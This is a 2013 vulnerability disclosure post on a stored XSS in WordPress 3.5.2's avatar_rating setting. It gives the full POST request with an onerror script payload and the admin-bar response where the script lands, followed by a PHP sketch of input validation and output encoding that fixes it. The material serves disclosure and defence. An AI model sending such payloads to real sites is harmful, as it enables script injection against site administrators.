Saturday 20 July 2013

[EN] WordPress 3.5.2 - Persistent XSS

Hi,

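Another persistent XSS mentioned here is located in the 'avatar' section of WordPress. The avatar_rating value saved through the discussion settings form is stored and later written, unescaped, into the avatar image tag of the admin bar.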

Check it out:

---< code >---
POST /wp/wordpress/wp-admin/options.php HTTP/1.1
Host: 192.168.255.105
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 608

option_page=discussion&action=update&_wpnonce=
369fdac5f5&_wp_http_referer=%2Fwp%2Fwordpress%2Fwp-admin%2F
options-discussion.php%3Fsettings-updated%3Dtrue&default_ping_
status=open&default_comment_status=open&require_name_email=1&
close_comments_days_old=14&thread_comments=1&thread_comments_depth=5&
comments_per_page=0&default_comments_page=newest&comment_order=asc&
comments_notify=1&moderation_notify=1&comment_whitelist=1&
comment_max_links=2&moderation_keys=asd&blacklist_keys=asd&
show_avatars=1&
avatar_rating='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(12345)"%3e&
avatar_default=asdads&submit=Save+Changes 
 
---< code >---
 
Response with stored XSS:
 
---< code >--- 
<li id="wp-admin-bar-new-user"><a class="ab-item"  
href="http://192.168.255.105/wp/wordpress/wp-admin/user-new.php">User</a> 
 </li></ul></div>  </li></ul><ul id="wp-admin-bar-top-secondary" class="ab-top-secondary ab-top-menu">
<li id="wp-admin-bar-my-account" class="menupop with-avatar"><a class="ab-item" 
 aria-haspopup="true" href="http://192.168.255.105/wp/wordpress/wp-admin/profile.php" 
 title="My Account">Howdy, admin<img alt='' 
 src='http://0.gravatar.com/avatar/0ae4c976cc014ca98dff551be4794e02?s=16&amp;d=asdads&amp;r='>"><img/src="x"/onerror="alert(12345)">'
 class='avatar avatar-16 photo' height='16' width='16' /></a><div class="ab-sub-wrapper"><ul id="wp-admin-bar-user-actions" class="ab-submenu">
<li id="wp-admin-bar-user-info"><a class="ab-item" 
---< code >--- 
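A defensive sketch of the two controls missing in the response above, as an added example that is not part of the original post and is not WordPress core code. The helper names are hypothetical; the allow-list assumes the four Gravatar ratings (G, PG, R, X), and the sample value is the avatar_rating parameter from the request, URL-decoded.

```php
<?php
// Added example: hypothetical helper names, not WordPress core code.

// Gravatar rating values (assumed allow-list for avatar_rating).
const ALLOWED_RATINGS = ['G', 'PG', 'R', 'X'];

// Input side: accept only a known rating, otherwise fall back to 'G'.
function sanitize_avatar_rating(string $value): string
{
    $value = strtoupper(trim($value));
    return in_array($value, ALLOWED_RATINGS, true) ? $value : 'G';
}

// Unsafe pattern matching the response above: the stored value is
// concatenated into a single-quoted attribute without any encoding.
function avatar_img_unsafe(string $hash, string $default, string $rating): string
{
    return "<img alt='' src='http://0.gravatar.com/avatar/{$hash}?s=16&amp;d={$default}&amp;r={$rating}' />";
}

// Output side: URL-encode each query value, then HTML-encode the whole
// attribute value (ENT_QUOTES also encodes the single quote).
function avatar_img_safe(string $hash, string $default, string $rating): string
{
    $query = http_build_query(['s' => 16, 'd' => $default, 'r' => $rating]);
    $src = 'http://0.gravatar.com/avatar/' . rawurlencode($hash) . '?' . $query;
    return "<img alt='' src='" . htmlspecialchars($src, ENT_QUOTES, 'UTF-8') . "' />";
}

// The avatar_rating value from the request above, URL-decoded.
$stored = '\'>"><img/src="x"/onerror="alert(12345)">';
$hash = '0ae4c976cc014ca98dff551be4794e02';

// 1. Unescaped: the value closes src='...' and injects a second tag.
echo avatar_img_unsafe($hash, 'asdads', $stored), "\n";
// 2. Encoded on output: the value stays inside the src attribute.
echo avatar_img_safe($hash, 'asdads', $stored), "\n";
// 3. Validated on save and encoded on output: r falls back to G.
echo avatar_img_safe($hash, 'asdads', sanitize_avatar_rating($stored)), "\n";
```

Either control alone stops this particular request; applying both covers values that reached the database before validation was in place.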


Enjoy ;)

o/
